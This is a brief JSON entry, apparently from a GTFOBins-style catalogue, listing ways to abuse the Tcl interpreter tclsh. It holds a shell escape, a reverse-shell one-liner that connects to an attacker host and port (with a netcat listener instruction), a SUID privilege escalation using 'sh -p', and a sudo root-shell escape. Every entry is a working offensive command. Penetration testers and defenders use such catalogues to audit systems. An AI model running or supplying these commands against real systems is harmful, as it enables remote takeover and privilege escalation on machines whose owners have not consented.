{
  "functions": {
    "shell": [
      {
        "code": "tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
      }
    ],
    "non-interactive-reverse-shell": [
      {
        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
        "code": "echo 'set s [socket \"[host]\" [port]];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\n"
      }
    ],
    "suid": [
      {
        "code": "./tclsh\nexec /bin/sh -p <@stdin >@stdout 2>@stderr\n"
      }
    ],
    "sudo": [
      {
        "code": "sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
      }
    ]
  }
}